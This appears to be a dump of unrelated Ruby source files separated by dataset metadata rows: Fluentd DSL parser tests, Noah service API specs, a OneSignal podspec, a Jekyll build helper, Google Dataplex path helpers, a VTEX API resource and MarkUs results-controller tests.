class TestDSLParser < ::Test::Unit::TestCase
sub_test_case 'with worker tag on top level' do
def setup
@root = Fluent::Config::DSL::Parser.parse(DSL_CONFIG_EXAMPLE, 'dsl_config.rb')
end
sub_test_case '.parse' do
test 'makes root element' do
assert_equal('ROOT', @root.name)
assert_predicate(@root.arg, :empty?)
assert_equal(0, @root.keys.size)
end
test 'makes worker element for worker tag' do
assert_equal(1, @root.elements.size)
worker = @root.elements.first
assert_equal('worker', worker.name)
assert_predicate(worker.arg, :empty?)
assert_equal(0, worker.keys.size)
assert_equal(10, worker.elements.size)
end
test 'makes subsections for blocks, with variable substitution' do
ele4 = @root.elements.first.elements[4]
assert_equal('source', ele4.name)
assert_predicate(ele4.arg, :empty?)
assert_equal(2, ele4.keys.size)
assert_equal('tail', ele4['type'])
assert_equal("/var/log/httpd/access.part4.log", ele4['path'])
end
test 'makes user-defined sections with blocks' do
filter0 = @root.elements.first.elements[4].elements.first
assert_equal('filter', filter0.name)
assert_equal('bar.**', filter0.arg)
assert_equal('hoge', filter0['type'])
assert_equal('moge', filter0['val1'])
assert_equal(JSON.dump(['foo', 'bar', 'baz']), filter0['val2'])
assert_equal('10', filter0['val3'])
assert_equal('hoge', filter0['id'])
assert_equal(2, filter0.elements.size)
assert_equal('subsection', filter0.elements[0].name)
assert_equal('bar', filter0.elements[0]['foo'])
assert_equal('subsection', filter0.elements[1].name)
assert_equal('baz', filter0.elements[1]['foo'])
end
test 'makes values with user-assigned variable substitutions' do
match0 = @root.elements.first.elements[4].elements.last
assert_equal('match', match0.name)
assert_equal('{foo,bar}.**', match0.arg)
assert_equal('file', match0['type'])
assert_equal('/var/log/httpd/access.myhostname.4.log', match0['path'])
end
end
end
sub_test_case 'without worker tag on top level' do
def setup
@root = Fluent::Config::DSL::Parser.parse(DSL_CONFIG_EXAMPLE_WITHOUT_WORKER, 'dsl_config_without_worker.rb')
end
sub_test_case '.parse' do
test 'makes root element' do
assert_equal('ROOT', @root.name)
assert_predicate(@root.arg, :empty?)
assert_equal(0, @root.keys.size)
end
test 'does not make worker element implicitly because DSL configuration does not support v10 compat mode' do
assert_equal(1, @root.elements.size)
assert_equal('source', @root.elements.first.name)
refute(@root.elements.find { |e| e.name == 'worker' })
end
end
end
sub_test_case 'with include conf' do
def setup
prepare_config1
@root = Fluent::Config::DSL::Parser.parse(DSL_CONFIG_EXAMPLE_FOR_INCLUDE_CONF, 'dsl_config_for_include.conf')
end
test 'include config' do
assert_equal('root_config', @root['k1'])
assert_equal('relative_path_include', @root['k2'])
assert_equal('relative_include_in_included_file', @root['k3'])
assert_equal('absolute_path_include', @root['k4'])
assert_equal('uri_include', @root['k5'])
assert_equal('wildcard_include_1', @root['k6'])
assert_equal('wildcard_include_2', @root['k7'])
assert_equal('wildcard_include_3', @root['k8'])
assert_equal([
'k1',
'k2',
'k3',
'k4',
'k5',
'k8', # Because of the file name this comes first.
'k6',
'k7',
], @root.keys)
elem1 = @root.elements.find { |e| e.name == 'elem1' }
assert(elem1)
assert_equal('name', elem1.arg)
assert_equal('normal_parameter', elem1['include'])
elem2 = @root.elements.find { |e| e.name == 'elem2' }
assert(elem2)
assert_equal('name', elem2.arg)
assert_equal('embeded', elem2['k9'])
assert_not_include(elem2, 'include')
elem3 = elem2.elements.find { |e| e.name == 'elem3' }
assert(elem3)
assert_equal('nested_value', elem3['nested'])
assert_equal('hoge', elem3['include'])
end
# TODO: Add uri based include spec
end
sub_test_case 'with include rb' do
def setup
prepare_config2
@root = Fluent::Config::DSL::Parser.parse(DSL_CONFIG_EXAMPLE_FOR_INCLUDE_RB, 'dsl_config_for_include.rb')
end
sub_test_case '.parse' do
test 'makes root element' do
assert_equal('ROOT', @root.name)
assert_predicate(@root.arg, :empty?)
assert_equal(0, @root.keys.size)
end
test 'makes worker element for worker tag' do
assert_equal(1, @root.elements.size)
worker = @root.elements.first
assert_equal('worker', worker.name)
assert_predicate(worker.arg, :empty?)
assert_equal(0, worker.keys.size)
assert_equal(10, worker.elements.size)
end
test 'makes subsections for blocks, with variable substitution' do
ele4 = @root.elements.first.elements[4]
assert_equal('source', ele4.name)
assert_predicate(ele4.arg, :empty?)
assert_equal(2, ele4.keys.size)
assert_equal('tail', ele4['type'])
assert_equal("/var/log/httpd/access.part4.log", ele4['path'])
end
test 'makes user-defined sections with blocks' do
filter0 = @root.elements.first.elements[4].elements.first
assert_equal('filter', filter0.name)
assert_equal('bar.**', filter0.arg)
assert_equal('hoge', filter0['type'])
assert_equal('moge', filter0['val1'])
assert_equal(JSON.dump(['foo', 'bar', 'baz']), filter0['val2'])
assert_equal('10', filter0['val3'])
assert_equal('hoge', filter0['id'])
assert_equal(2, filter0.elements.size)
assert_equal('subsection', filter0.elements[0].name)
assert_equal('bar', filter0.elements[0]['foo'])
assert_equal('subsection', filter0.elements[1].name)
assert_equal('baz', filter0.elements[1]['foo'])
end
test 'makes values with user-assigned variable substitutions' do
match0 = @root.elements.first.elements[4].elements.last
assert_equal('match', match0.name)
assert_equal('{foo,bar}.**', match0.arg)
assert_equal('file', match0['type'])
assert_equal('/var/log/httpd/access.myhostname.4.log', match0['path'])
end
end
end
sub_test_case 'with configuration that returns non element on top' do
sub_test_case '.parse' do
test 'does not crash' do
Fluent::Config::DSL::Parser.parse(DSL_CONFIG_RETURNS_NON_ELEMENT, 'dsl_config_returns_non_element.rb')
end
end
end
sub_test_case 'with configuration with wrong arguments for specific elements' do
sub_test_case '.parse' do
test 'raises ArgumentError correctly' do
assert_raise(ArgumentError) { Fluent::Config::DSL::Parser.parse(DSL_CONFIG_WRONG_SYNTAX1, 'dsl_config_wrong_syntax1') }
assert_raise(ArgumentError) { Fluent::Config::DSL::Parser.parse(DSL_CONFIG_WRONG_SYNTAX2, 'dsl_config_wrong_syntax2') }
assert_raise(ArgumentError) { Fluent::Config::DSL::Parser.parse(DSL_CONFIG_WRONG_SYNTAX3, 'dsl_config_wrong_syntax3') }
assert_raise(ArgumentError) { Fluent::Config::DSL::Parser.parse(DSL_CONFIG_WRONG_SYNTAX4, 'dsl_config_wrong_syntax4') }
end
end
end
sub_test_case 'with ruby keyword, that provides ruby Kernel module features' do
sub_test_case '.parse' do
test 'can get result of Kernel.open() by ruby.open()' do
uname_string = `uname -a`
root = Fluent::Config::DSL::Parser.parse(<<DSL)
worker {
uname_str = ruby.open('|uname -a'){|out| out.read}
source {
uname uname_str
}
}
DSL
worker = root.elements.first
assert_equal('worker', worker.name)
source = worker.elements.first
assert_equal('source', source.name)
assert_equal(1, source.keys.size)
assert_equal(uname_string, source['uname'])
end
test 'accepts ruby keyword with block, which allow to use methods included from ::Kernel' do
root = Fluent::Config::DSL::Parser.parse(<<DSL)
worker {
ruby_version = ruby {
require 'erb'
ERB.new('<%= RUBY_VERSION %> from erb').result
}
source {
version ruby_version
}
}
DSL
worker = root.elements.first
assert_equal('worker', worker.name)
source = worker.elements.first
assert_equal('source', source.name)
assert_equal(1, source.keys.size)
assert_equal("#{RUBY_VERSION} from erb", source['version'])
end
test 'raises NoMethodError when configuration DSL elements are written in ruby block' do
conf = <<DSL
worker {
ruby {
source {
type "tail"
}
}
source {
uname uname_str
}
}
DSL
assert_raise(NoMethodError) { Fluent::Config::DSL::Parser.parse(conf) }
end
end
end
end
end
| 30.036058 | 129 | 0.62385 |
1de006a8902ac72e0aa2a6cd5ef2882966c0308b | 8,534 | require File.expand_path(File.dirname(__FILE__) + '/spec_helper')
describe "Using the Service API", :reset_redis => false, :populate_sample_data => true do
before(:all) do
@sample_host = {:name => 'rspec_sample_host', :status => 'up'}
@sample_service = {:name => 'rspec_sample_service', :status => 'up'}
@h = Noah::Host.create(:name => 'rspec_sample_host', :status => 'up')
@h.services << Noah::Service.create({:host => @h}.merge(@sample_service))
@h.save
@s = Noah::Service.find(@sample_service).first
end
describe "calling" do
describe "GET" do
it "all services should work" do
get '/services'
last_response.should be_ok
response = last_response.should return_json
response.is_a?(Hash).should == true
end
it "all named services should work" do
get "/services/#{@sample_service[:name]}"
last_response.should be_ok
response = last_response.should return_json
response.class.to_s.should == "Hash"
response.has_key?(@s.name.to_s).should == true
response["#{@s.name}"].class.to_s.should == "Hash"
response["#{@s.name}"].has_key?(@h.name.to_s).should == true
response["#{@s.name}"]["#{@h.name}"].class.to_s.should == "Hash"
response["#{@s.name}"]["#{@h.name}"]["id"].should == @s.id
response["#{@s.name}"]["#{@h.name}"]["status"].should == @s.status
end
it "named service for host should work" do
get "/services/#{@sample_service[:name]}/#{@sample_host[:name]}"
last_response.should be_ok
response = last_response.should return_json
response["id"].should == @s.id
response["name"].should == @s.name
response["status"].should == @s.status
response["host"].should == @h.name
end
it "missing service for host should not work" do
get '/services/foobar/baz'
last_response.should be_missing
end
end
describe "PUT" do
before(:each) do
Ohm.redis.flushdb
@host_name = 'rspec_sample_host'
@service_name = 'rspec_sample_service'
@payload = {:status => 'up', :host_status => 'up'}
end
after(:each) do
Ohm.redis.flushdb
end
it "new service on new host should work" do
put "/services/#{@service_name}/#{@host_name}", @payload.to_json, "CONTENT_TYPE" => "application/json"
last_response.should be_ok
response = last_response.should return_json
response["result"].should == "success"
response["action"].should == "create"
response["id"].nil?.should == false
response["name"].should == @service_name
response["host"]["name"].should == @host_name
response["host"]["status"].should == 'up'
response["host"]["action"].should == 'create'
response["host"]["status"].should == 'up'
Noah::Service.find(:name => @service_name).size.should == 1
Noah::Service.find(:name => @service_name).first.is_new?.should == true
Noah::Host.find(:name => @host_name).size.should == 1
Noah::Host.find(:name => @host_name).first.is_new?.should == true
end
it "new service on existing host should work" do
hostname = 'non-existant-rspec-host'
servicename = 'non-existant-rspec-service'
Noah::Host.create(:name => hostname, :status => 'up')
sleep(3)
put "/services/#{servicename}/#{hostname}", @payload.to_json, "CONTENT_TYPE" => "application/json"
last_response.should be_ok
response = last_response.should return_json
response["result"].should == "success"
response["action"].should == "create"
response["id"].nil?.should == false
response["name"].should == servicename
response["host"]["name"].should == hostname
response["host"]["status"].should == 'up'
response["host"]["action"].should == 'update'
Noah::Service.find(:name => servicename).size.should == 1
Noah::Service.find(:name => servicename).first.is_new?.should == true
end
it "new service with invalid host status should not work" do
put "/services/foobar/#{@host_name}", {:host_status => "fsck", :status => "up"}.to_json, "CONTENT_TYPE" => "application/json"
last_response.should_not be_ok
response = last_response.should return_json
response["error_message"].should == "Status must be up, down or pending"
end
it "new service with invalid service status should not work" do
put "/services/foobar/#{@host_name}", {:host_status => "up", :status => "fsck"}.to_json, "CONTENT_TYPE" => "application/json"
last_response.should_not be_ok
response = last_response.should return_json
response["error_message"].should == "Status must be up, down or pending"
end
it "new service with missing host_status should not work" do
put "/services/foobar/#{@host_name}", {:status => "up"}.to_json, "CONTENT_TYPE" => "application/json"
last_response.should be_invalid
end
it "new service with missing status should not work" do
put "/services/foobar/#{@host_name}", {:host_status => 'up'}.to_json, "CONTENT_TYPE" => "application/json"
last_response.should be_invalid
end
it "existing service should work" do
a = Noah::Host.create(:name => @host_name, :status => 'up')
b = Noah::Service.create(:name => @service_name, :status => 'pending', :host => a)
sleep(3)
put "/services/#{@service_name}/#{@host_name}", @payload.to_json, "CONTENT_TYPE" => "application/json"
last_response.should be_ok
response = last_response.should return_json
response["result"].should == "success"
response["action"].should == "update"
response["id"].nil?.should == false
response["name"].should == @service_name
response["host"]["name"].should == @host_name
response["host"]["status"].should == 'up'
response["host"]["action"].should == 'update'
end
end
describe "DELETE" do
before(:all) do
Ohm.redis.flushdb
@h = Noah::Host.create(:name => "h1", :status => "up")
@h.services << Noah::Service.create(:name => "s1", :status => "up", :host => @h)
@h.save
@s = @h.services.first
end
it "service from existing host should work" do
delete "/services/#{@s.name}/#{@h.name}"
last_response.should be_ok
response = last_response.should return_json
response["result"].should == "success"
response["action"].should == "delete"
response["id"].should == @s.id
response["host"].should == @h.name
response["service"].should == @s.name
end
it "all entries for a valid service" do
all_svc_name = 'my_sample_service'
foo_svc_name = 'my_sample_service_two'
bar_svc_name = 'my_sample_service_three'
%w[foo bar baz].each do |host|
h = Noah::Host.create(:name => host, :status => "up")
Noah::Service.create(:name => all_svc_name, :status => 'up', :host => h)
end
foo_host = Noah::Host.find(:name => 'foo').first
bar_host = Noah::Host.find(:name => 'bar').first
Noah::Service.create(:name => foo_svc_name, :status => 'down', :host => foo_host)
Noah::Service.create(:name => bar_svc_name, :status => 'pending', :host => bar_host)
delete "/services/#{all_svc_name}"
last_response.should be_ok
response = last_response.should return_json
response["result"].should == "success"
response["action"].should == "delete"
response["affected_hosts"].should == 3
delete "/services/#{foo_svc_name}"
last_response.should be_ok
response = last_response.should return_json
response["affected_hosts"].should == 1
end
it "service for invalid host should not work" do
delete "/services/#{@s.name}/#{@h.name}"
last_response.should be_missing
end
it "invalid service for valid host should not work" do
Noah::Host.create(:name => 'valid_host', :status => 'up')
delete "/services/not_really_here/valid_host"
last_response.should be_missing
end
it "all entries for an invalid service should not_work" do
delete "/services/not_really_here"
last_response.should be_missing
end
end
end
end
| 44.915789 | 133 | 0.608156 |
1daea8a8328be22d9cefec01b68c714bda4ea5f4 | 821 | Pod::Spec.new do |s|
s.name = "OneSignalXCFramework"
s.version = "3.4.4"
s.summary = "OneSignal push notification library for mobile apps."
s.homepage = "https://onesignal.com"
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { "Joseph Kalash" => "[email protected]", "Josh Kasten" => "[email protected]" , "Brad Hesse" => "[email protected]"}
s.source = { :git => "https://github.com/OneSignal/OneSignal-iOS-SDK.git", :tag => s.version.to_s }
s.platform = :ios
s.requires_arc = true
s.ios.vendored_frameworks = 'iOS_SDK/OneSignalSDK/OneSignal_XCFramework/OneSignal.xcframework'
s.preserve_paths = 'iOS_SDK/OneSignalSDK/OneSignal_XCFramework/OneSignal.xcframework'
end
| 48.294118 | 147 | 0.606577 |
03bcdc14d6852538a62ceac3d4c5b3bf713f5b2b | 874 | # Builds the Hub in a temp directory for use by several tests.
#
# Just adding `require_relative 'site_builder'` at the beginning of the test
# file is all that's required.
module Hub
class SiteBuilder
BUILD_DIR = File.join(Dir.pwd, '_test', 'tmp')
unless system(
"bundle exec jekyll build --destination #{BUILD_DIR} --trace",
{:out => '/dev/null', :err =>STDERR})
STDERR.puts "\n***\nSiteBuilder failed to build site for tests\n***\n"
exit $?.exitstatus
end
PUBLIC_BUILD_DIR = "#{BUILD_DIR}_public"
unless system(
"bundle exec jekyll build --destination #{PUBLIC_BUILD_DIR} --trace " +
"--config _config.yml,_config_public.yml",
{:out => '/dev/null', :err =>STDERR})
STDERR.puts("\n***\nSiteBuilder failed to build public site " +
"for tests\n***\n")
exit $?.exitstatus
end
end
end
| 33.615385 | 77 | 0.639588 |
f7a25a668f6b09da6ebd1dceaba36ee63958926b | 7,073 | # frozen_string_literal: true
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
module Google
module Cloud
module Dataplex
module V1
module DataplexService
# Path helper methods for the DataplexService API.
module Paths
##
# Create a fully-qualified Asset resource string.
#
# The resource will be in the following format:
#
# `projects/{project}/locations/{location}/lakes/{lake}/zones/{zone}/assets/{asset}`
#
# @param project [String]
# @param location [String]
# @param lake [String]
# @param zone [String]
# @param asset [String]
#
# @return [::String]
def asset_path project:, location:, lake:, zone:, asset:
raise ::ArgumentError, "project cannot contain /" if project.to_s.include? "/"
raise ::ArgumentError, "location cannot contain /" if location.to_s.include? "/"
raise ::ArgumentError, "lake cannot contain /" if lake.to_s.include? "/"
raise ::ArgumentError, "zone cannot contain /" if zone.to_s.include? "/"
"projects/#{project}/locations/#{location}/lakes/#{lake}/zones/#{zone}/assets/#{asset}"
end
##
# Create a fully-qualified Environment resource string.
#
# The resource will be in the following format:
#
# `projects/{project}/locations/{location}/lakes/{lake}/environments/{environment}`
#
# @param project [String]
# @param location [String]
# @param lake [String]
# @param environment [String]
#
# @return [::String]
def environment_path project:, location:, lake:, environment:
raise ::ArgumentError, "project cannot contain /" if project.to_s.include? "/"
raise ::ArgumentError, "location cannot contain /" if location.to_s.include? "/"
raise ::ArgumentError, "lake cannot contain /" if lake.to_s.include? "/"
"projects/#{project}/locations/#{location}/lakes/#{lake}/environments/#{environment}"
end
##
# Create a fully-qualified Job resource string.
#
# The resource will be in the following format:
#
# `projects/{project}/locations/{location}/lakes/{lake}/tasks/{task}/jobs/{job}`
#
# @param project [String]
# @param location [String]
# @param lake [String]
# @param task [String]
# @param job [String]
#
# @return [::String]
def job_path project:, location:, lake:, task:, job:
raise ::ArgumentError, "project cannot contain /" if project.to_s.include? "/"
raise ::ArgumentError, "location cannot contain /" if location.to_s.include? "/"
raise ::ArgumentError, "lake cannot contain /" if lake.to_s.include? "/"
raise ::ArgumentError, "task cannot contain /" if task.to_s.include? "/"
"projects/#{project}/locations/#{location}/lakes/#{lake}/tasks/#{task}/jobs/#{job}"
end
##
# Create a fully-qualified Lake resource string.
#
# The resource will be in the following format:
#
# `projects/{project}/locations/{location}/lakes/{lake}`
#
# @param project [String]
# @param location [String]
# @param lake [String]
#
# @return [::String]
def lake_path project:, location:, lake:
raise ::ArgumentError, "project cannot contain /" if project.to_s.include? "/"
raise ::ArgumentError, "location cannot contain /" if location.to_s.include? "/"
"projects/#{project}/locations/#{location}/lakes/#{lake}"
end
##
# Create a fully-qualified Location resource string.
#
# The resource will be in the following format:
#
# `projects/{project}/locations/{location}`
#
# @param project [String]
# @param location [String]
#
# @return [::String]
def location_path project:, location:
raise ::ArgumentError, "project cannot contain /" if project.to_s.include? "/"
"projects/#{project}/locations/#{location}"
end
##
# Create a fully-qualified Task resource string.
#
# The resource will be in the following format:
#
# `projects/{project}/locations/{location}/lakes/{lake}/tasks/{task}`
#
# @param project [String]
# @param location [String]
# @param lake [String]
# @param task [String]
#
# @return [::String]
def task_path project:, location:, lake:, task:
raise ::ArgumentError, "project cannot contain /" if project.to_s.include? "/"
raise ::ArgumentError, "location cannot contain /" if location.to_s.include? "/"
raise ::ArgumentError, "lake cannot contain /" if lake.to_s.include? "/"
"projects/#{project}/locations/#{location}/lakes/#{lake}/tasks/#{task}"
end
##
# Create a fully-qualified Zone resource string.
#
# The resource will be in the following format:
#
# `projects/{project}/locations/{location}/lakes/{lake}/zones/{zone}`
#
# @param project [String]
# @param location [String]
# @param lake [String]
# @param zone [String]
#
# @return [::String]
def zone_path project:, location:, lake:, zone:
raise ::ArgumentError, "project cannot contain /" if project.to_s.include? "/"
raise ::ArgumentError, "location cannot contain /" if location.to_s.include? "/"
raise ::ArgumentError, "lake cannot contain /" if lake.to_s.include? "/"
"projects/#{project}/locations/#{location}/lakes/#{lake}/zones/#{zone}"
end
extend self
end
end
end
end
end
end
| 39.513966 | 101 | 0.545737 |
ac12dfeeef10a54d528fc04291b4dec8b835b804 | 1,030 | module Vtex
class SpecificationResource < ResourceKit::Resource
resources do
action :specification_by_category_id, 'GET /api/catalog_system/pub/specification/field/listByCategoryId/:category_id' do
handler(200) { |response| SpecificationMapping.extract_collection(response.body, :read) }
end
action :specification_tree_by_category_id, 'GET /api/catalog_system/pub/specification/field/listTreeByCategoryId/:category_id' do
handler(200) { |response| SpecificationMapping.extract_collection(response.body, :read) }
end
action :specification_value_by_field_id, 'GET /api/catalog_system/pub/specification/fieldvalue/:field_id' do
handler(200) { |response| SpecificationValueByFieldIdMapping.extract_collection(response.body, :read) }
end
action :specification_field, 'GET /api/catalog_system/pub/specification/fieldGet/:field_id' do
handler(200) { |response| SpecificationFieldMapping.extract_single(response.body, :read) }
end
end
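    # Usage sketch (illustrative; assumes a ResourceKit connection — e.g. a
    # Faraday client configured for the VTEX catalog API — which is not
    # defined in this file):
    #
    #   resource = Vtex::SpecificationResource.new(connection: connection)
    #   resource.specification_by_category_id(category_id: 42)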
end
end
| 46.818182 | 135 | 0.756311 |
ff2a3514ee5255bd68941c2ecd1385d0b20e9ca4 | 43,947 | require File.expand_path(File.join(File.dirname(__FILE__), 'authenticated_controller_test'))
require File.expand_path(File.join(File.dirname(__FILE__), '..', 'test_helper'))
require File.expand_path(File.join(File.dirname(__FILE__), '..', 'blueprints', 'helper'))
require 'shoulda'
class ResultsControllerTest < AuthenticatedControllerTest
def teardown
destroy_repos
end
SAMPLE_ERR_MSG = 'sample error message'
should 'recognize routes' do
assert_recognizes({controller: 'results',
action: 'update_mark',
assignment_id: '1',
submission_id: '1'},
{path: 'assignments/1/submissions/1/results/update_mark',
method: :post})
end
context 'A user' do
# Since we are not authenticated and authorized, we should be redirected
# to the login page
should 'be redirected from edit' do
get :edit, params: { assignment_id: 1, submission_id: 1, id: 1 }
assert_response :redirect
end
should 'not be able to get the next_grouping' do
get :next_grouping, params: { assignment_id: 1, submission_id: 1, id: 1 }
assert_response :redirect
end
should 'not be able to set_released to student' do
get :set_released_to_students, params: { assignment_id: 1, submission_id: 1, id: 1 }
assert_response :redirect
end
should 'not be able to update marking state' do
get :toggle_marking_state, params: { assignment_id: 1, submission_id: 1, id: 1 }
assert_response :redirect
end
should 'not be able to update overall comment' do
get :update_overall_comment, params: { assignment_id: 1, submission_id: 1, id: 1 }
assert_response :redirect
end
should 'not be able to update remark request' do
get :update_remark_request, params: { assignment_id: 1, submission_id: 1, id: 1 }
assert_response :redirect
end
should 'not be able to cancel remark request' do
delete :cancel_remark_request, params: { assignment_id: 1, submission_id: 1, id: 1 }
assert_response :redirect
end
should 'not be able to download a file' do
get :download, params: { assignment_id: 1, submission_id: 1, id: 1, select_file_id: 1 }
assert_response :redirect
end
should 'not be able to update mark' do
get :update_mark, params: { assignment_id: 1, submission_id: 1, id: 1, mark_id: 1, mark: 0 }
assert_response :redirect
end
should 'not be able to view marks' do
get :view_marks, params: { assignment_id: 1, submission_id: 1, id: 1 }
assert_response :redirect
end
should 'not be able to add extra mark' do
get :add_extra_mark, params: { assignment_id: 1, submission_id: 1, id: 1, extra_mark: 1 }
assert_response :redirect
end
should 'not be able to remove extra marks' do
get :remove_extra_mark, params: { assignment_id: 1, submission_id: 1, id: 1 }
assert_response :redirect
end
end # unauthenticated and unauthorized user doing
context 'A student' do
{setup_student_flexible: 'flexible',
setup_student_rubric: 'rubric'}.each do |setup_method, criterion_type|
context "Using #{criterion_type} and doing a" do
setup do
@student = Student.make
@assignment = Assignment.make
@grouping = Grouping.make(assignment: @assignment)
StudentMembership.make(
grouping: @grouping,
user: @student,
membership_status: StudentMembership::STATUSES[:inviter])
@submission = Submission.make(grouping: @grouping)
@result = @grouping.submissions.first.get_latest_result
end
should 'not be able to get edit' do
get_as @student, :edit, params: { assignment_id: @assignment.id, submission_id: 1, id: @result.id }
assert_response :missing
assert render_template 404
end
should 'not be able to get next_grouping' do
get_as @student, :next_grouping, params: { assignment_id: @assignment.id, submission_id: 1,
grouping_id: @grouping.id, id: @result.id }
assert_response :missing
assert render_template 404
end
should 'GET on :set_released_to_student' do
get_as @student, :set_released_to_students, params: { assignment_id: @assignment.id, submission_id: 1,
id: @result.id }
assert_response :missing
assert render_template 404
end
should 'GET on :toggle_marking_state' do
get_as @student, :toggle_marking_state, params: { assignment_id: @assignment.id, submission_id: 1,
id: @result.id },
format: :js
assert_response :missing
assert render_template 404
end
should 'GET on :update_overall_comment' do
@new_comment = 'a changed overall comment!'
get_as @student, :update_overall_comment, params: { assignment_id: @assignment.id, submission_id: 1,
id: @result.id,
result: { overall_comment: @new_comment } }
assert_response :missing
assert render_template 404
@result.reload
assert_not_equal @result.overall_comment, @new_comment
end
should 'POST on :update_overall_comment' do
@new_comment = 'a changed overall comment!'
post_as @student, :update_overall_comment, params: { assignment_id: @assignment.id, submission_id: 1,
id: @result.id,
result: { overall_comment: @new_comment } }
assert_response :missing
assert render_template 404
@result.reload
assert_not_equal @result.overall_comment, @new_comment
end
context 'GET on :download' do
setup do
@file = SubmissionFile.new
end
context 'without file error' do
should 'with permissions to download the file' do
@file.expects(:filename).once.returns('filename')
@file.expects(:is_supported_image?).once.returns(false)
@file.expects(:retrieve_file).returns('file content')
ResultsController.any_instance.stubs(
:authorized_to_download?).once.returns(true)
SubmissionFile.stubs(:find).once.returns(@file)
get_as @student, :download, params: { assignment_id: 1, submission_id: 1, select_file_id: 1, id: 1 }
assert_equal true, flash.empty?
assert_equal response.header['Content-Type'], 'application/octet-stream'
assert_response :success
assert_equal 'file content', @response.body
end # -- with permissions to download the file
should 'without permissions to download the file' do
ResultsController.any_instance.stubs(
:authorized_to_download?).once.returns(false)
get_as @student, :download, params: { assignment_id: 1, submission_id: 1, select_file_id: 1, id: 1 }
assert_equal true, flash.empty?
assert_response :missing
assert render_template 404
end # -- without permissions to download the file
end # -- without file error
should 'be able to retrieve_file with file error' do
@file.expects(:submission).twice.returns(@result.submission)
@file.expects(
:retrieve_file).once.raises(Exception.new(SAMPLE_ERR_MSG))
ResultsController.any_instance.stubs(
:authorized_to_download?).once.returns(true)
SubmissionFile.stubs(:find).once.returns(@file)
get_as @student, :download, params: { assignment_id: 1, submission_id: 1, id: 1, select_file_id: 1 }
assert_equal flash[:file_download_error], SAMPLE_ERR_MSG
assert_response :redirect
end
should 'with supported image to be displayed inside browser' do
@file.expects(:filename).once.returns('filename.supported_image')
@file.expects(:is_supported_image?).once.returns(true)
@file.expects(:retrieve_file).returns('file content')
ResultsController.any_instance.stubs(
:authorized_to_download?).once.returns(true)
SubmissionFile.stubs(:find).once.returns(@file)
get_as @student, :download, params: { assignment_id: 1, submission_id: 1, select_file_id: 1, id: 1,
show_in_browser: true }
assert_equal true, flash.empty?
assert_equal response.header['Content-Type'], 'image'
assert_response :success
assert_equal 'file content', @response.body
end
should 'with annotations included' do
@file.expects(:filename).once.returns('filename')
@file.expects(:is_supported_image?).once.returns(false)
@file.expects(:retrieve_file).returns('file content')
ResultsController.any_instance.stubs(:authorized_to_download?).once.returns(true)
SubmissionFile.stubs(:find).once.returns(@file)
get_as @student, :download, params: { assignment_id: 1, submission_id: 1, select_file_id: 1, id: 1,
include_annotations: true }
assert_equal true, flash.empty?
assert_equal response.header['Content-Type'], 'application/octet-stream'
assert_response :success
assert_equal 'file content', @response.body
end
end
should 'GET on :update_mark' do
get_as @student, :update_mark, params: { assignment_id: @assignment.id, submission_id: 1, id: @result.id,
mark_id: 1, mark: 0 }
assert_response :missing
assert render_template 404
end
context 'GET on :view_marks' do
should 'and his grouping has no submission' do
Grouping.any_instance.expects(:has_submission?).once.returns(false)
get_as @student, :view_marks, params: { assignment_id: @assignment.id, submission_id: 1, id: @result.id }
assert_not_nil assigns :assignment
assert_not_nil assigns :grouping
assert render_template 'results/student/no_submission'
assert_response :success
end
should 'and his submission has no result' do
Submission.any_instance.expects(:has_result?).once.returns(false)
get_as @student, :view_marks, params: { assignment_id: @assignment.id, submission_id: 1, id: @result.id }
assert_not_nil assigns :assignment
assert_not_nil assigns :grouping
assert_not_nil assigns :submission
assert render_template 'results/student/no_result'
assert_response :success
end
should 'and the result has not been released' do
Result.any_instance.expects(
:released_to_students).once.returns(false)
get_as @student, :view_marks, params: { assignment_id: @assignment.id, submission_id: @submission.id,
id: @result.id }
assert_not_nil assigns :assignment
assert_not_nil assigns :grouping
assert_not_nil assigns :submission
assert_not_nil assigns :result
assert render_template 'results/student/no_result'
assert_response :success
end
should 'and the result is available' do
SubmissionFile.make(submission: @submission)
Mark.make(criterion_type.to_sym, result: @result)
AnnotationCategory.make(assignment: @assignment)
@submission_file = @result.submission.submission_files.first
@result.marking_state = Result::MARKING_STATES[:complete]
@result.released_to_students = true
@result.save
get_as @student, :view_marks, params: { assignment_id: @assignment.id, submission_id: 1, id: @result.id }
assert_not_nil assigns :assignment
assert_not_nil assigns :grouping
assert_not_nil assigns :submission
assert_not_nil assigns :result
assert_not_nil assigns :mark_criteria
assert_not_nil assigns :annotation_categories
assert_not_nil assigns :group
assert_not_nil assigns :files
assert_not_nil assigns :extra_marks_points
assert_not_nil assigns :extra_marks_percentage
assert_not_nil assigns :marks_map
assert_response :success
assert render_template :view_marks
end
end
should 'GET on :add_extra_mark' do
get_as @student, :add_extra_mark, params: { assignment_id: 1, submission_id: 1, id: @result.id,
extra_mark: 1 }
assert_response :missing
assert render_template 404
end
should 'GET on :remove_extra_mark' do
get_as @student, :remove_extra_mark, params: { assignment_id: 1, submission_id: 1, id: @result.id }
assert_response :missing
assert render_template 404
end
end
end
end # An authenticated and authorized student doing a
context 'An admin' do
{setup_admin_flexible: 'flexible',
setup_admin_rubric: 'rubric'}.each do |setup_method, criterion_type|
context "using #{criterion_type} and doing a" do
setup do
@admin = Admin.make
@assignment = Assignment.make
end
context 'GET on :edit' do
context 'with 2 incomplete and 1 released/completed results' do
setup do
3.times do |time|
g = Grouping.make(assignment: @assignment)
s = Submission.make(grouping: g)
student = Student.make
if time == 2
@result = s.get_latest_result
@result.marking_state = Result::MARKING_STATES[:complete]
@result.released_to_students = true
@result.save
end
StudentMembership.make(grouping: g,
user: student,
membership_status:
StudentMembership::STATUSES[:inviter])
end
@groupings = @assignment.groupings.order(:id)
end
          should 'have an edit form with correct actions for ' +
                     'overall comment' do
# Use a released result as the original result.
original_result = @result
submission = original_result.submission
submission.make_remark_result
submission.update(remark_request_timestamp: Time.zone.now)
get_as @admin, :edit, params: { assignment_id: @assignment.id, submission_id: submission.id,
id: submission.remark_result.id }
path_prefix = "/en/assignments/#{@assignment.id}" +
"/submissions/#{submission.id}/results"
assert_select '#overall_comment_edit form[action=' +
